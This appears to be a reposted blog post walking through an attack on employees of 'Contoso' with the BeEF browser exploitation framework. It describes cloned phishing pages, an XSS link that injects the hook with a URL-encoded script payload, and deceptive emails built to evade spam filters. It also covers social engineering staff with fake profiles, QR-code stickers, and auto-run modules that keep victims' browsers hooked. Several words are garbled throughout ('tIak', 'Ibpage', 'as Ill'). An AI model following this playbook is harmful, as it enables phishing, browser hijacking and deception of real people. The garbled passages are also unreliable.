BEEF :- BROWSER EXPLOITATION FRAMEWORK Preparing The Hook First, I set the hook on our phishing page. It should have the same anatomy of the original webbsite (Header, footer, side panes, CSS, ...etc), served on our “secure” SSL enabled phishing page on Contso. Ill add a loading progress bar in the middle pane and put up a user friendly message that says this page might take some time to load. Ill set up the progress bar with an inverse exponential decaying function. The Javascript code below is an example of the progress code that can be used. totalProgress = 100; currentProgress = 1.0; while (currentProgress < totalProgress) { currentProgress = currentProgress + (Math.exp(currentProgress / -3) ); sleep(100); } By going fast at the beginning, and slower towards the end, our hope is the visitor should feel encouraged, safe, and be less likely to close the page out of boredom. I even hope the user will switch tabs, leaving this in the background to load, and give us a longer chance to hook and do our BeEFY tricks. Second, I prepare our XSS exploit link. The XSS Javascript exploit should inject BEeF’s hook into the vulnerable page. The exploit link should rewrite the center pane of the vulnerable page to remove any original content and add the loading progress bar. It should look identical to our phishing domain. This should decrease the probability of the victim noticing anything wrong and maximize the time he will stay hooked. Furthermore, I can use some basic link obfuscation to trick savvy victims. This can be achieved by forcing URL encoding for the whole value of the vulnerable parameter (including readable text). For example, the query parameter: search=” should look like: search=%22%3c%73%63%72%69%70%74%20%73%72%63%3d%1d%74%65%73%74%2e%6a%73%22%3e Also, URL shortening services can be a good tool for hiding the main link. They are very common for use on social networks, especially on Twitter. Hooking Grounds The first hooking ground I target is corporate email. I need to get our hands on a sample from Contoso’s internal email to make our phishing emails look more convincing. I want to match internal email anatomy (headers, fonts, text colors, signatures, ...etc). Ill need to do some more social engineering. I use our fictional profile to go into the conversation about the sunglasses and ask for more details. Posing as a clueless new employee of Contoso, I receive a couple of responses about how the discount works. I take the discussion away from the public group to a private one-on-one conversation with the most friendly respondents, and ask them to forward the email to a non-corporate email under the ruse that our corporate email is not fully active yet. Bingo! Now that I have the email, I craft a new one having the same anatomy of the sample I have, announcing the launch of a new football tournament. The email should appear to come from the sports committee and should have in the “to” field the same group name as the one from the original discount email. In the email body, I salute last year’s winners and add their picture with the trophy for a more convincing flavor; assuring people about the authenticity of the email. And of course, I end the email with a “find out more” link that points to our hook. Since I have two hooking strategies, I split our targets into two sets. To one, I send links pointing to phishing hook. To the other set, I send links pointing to the XSS hook. It’s noteworthy to mention that I need to tIak our server while sending phishing emails. I want to make sure I dont end up in the recipients spam folders. The server name is should be set correctly to match the sending domain name. The reverse PTR record of the phishing domain name should match the server’s IP. There should be an SPF record allowing the IP of our server to send emails using the phishing domain. This is a good SPF record builder from Microsoft. Make sure that the server’s ISP IP blocks are not on any email spam blacklists. This is a handy free online blacklist checker. These are all common tactics mail filters check for to identify spam. The next hooking ground I target is social networking. I start by participating in group conversations and rants about work environment, politics, ...etc. but never in a direct conversation to keep our secret identity. Keeping our opinion with the flow also prevents controversial discussions that may trigger alarms. The target of this phase is to get people familiar with our display names popping on their news feed, so they don’t feel it’s odd when they see a link as our first interaction. After a day or two of interactivity, I start the fun! I send a few buzzing words with a link to check the details. Buzzing social network announcements have to rely on psychological need for a wide range of employees. This can be found from what people are saying about their company on Facebook and twitter. At Contoso, based on what I found, I thought of a few good buzzing messages: On twitter, I tIet ”OMG! has resigned! Embarrassing video #screwContosoBoard” with retweets from different accounts. On Facebook, on the non-official group I broadcast the following buzzing messages from different fake profiles and maybe choose one of them to be shared on the wall some of the fake profiles: “Big bonus for referral to this vacancy , do you know anyone?” “Sign with us this petition to demand a salary raise . Be positive and I will make a difference!” I might even get to the secret cow level if I combine social engineering with physical materials that links to the hook. Good examples include: Fill Contoso near-by streets with Stickers having a QR code with the XSS exploit link. Distribute ad-like flyers in front of Contoso’s HQ with a short URL to the phishing page. Adding Sinkers Now that I have some people clicking links and getting hooked, I need to keep them hooked for as long as possible. Our sinking strategy relies on social engineering in addition to two helping modules in BeEF. The greatest sinker of all is how I engineer the phishing/XSS pages to convince the people to stay more. As mentioned earlier, the progress bar is a good trick. When combined with suitably entertaining animations, it would do the job. The pop-under module serves as a good persistence technique as Ill. I set its configuration to auto-run (from it’s corresponding config.yaml) such that it runs whenever a user is hooked. The module attempts to open a small pop-under window that to keep the browser hooked even if the user closes the main tab. Be careful, though, sometimes this gets blocked by pop-up blockers. I also want to use the man-in-the-browser module. Ill set this to auto-run as Ill. This ensures that, whenever the zombie clicks on any link on the phishing page, the next page will still be hooked. Someone would have to manually type a new address in the address bar to get away from our hook. Finally, I use the frame-above module which is the best option for persistence if I are dealing with IE. It basically rewrites all links on the Ibpage to spawn a 100% by 100% iFrame with a source relative to the selected link; allowing ultra persistence. Michele antisnatchor Orru, BeEFs Lead Core Developer, talked about an Ultra cool way to automate the whole process at AthCon 2012 and even created a Ruby script that utilizes our latest REST API to do Java 1.6.0u27 mass pwnage!
Posted on: Mon, 03 Feb 2014 11:23:01 +0000
Trending Topics
Recently Viewed Topics
© 2015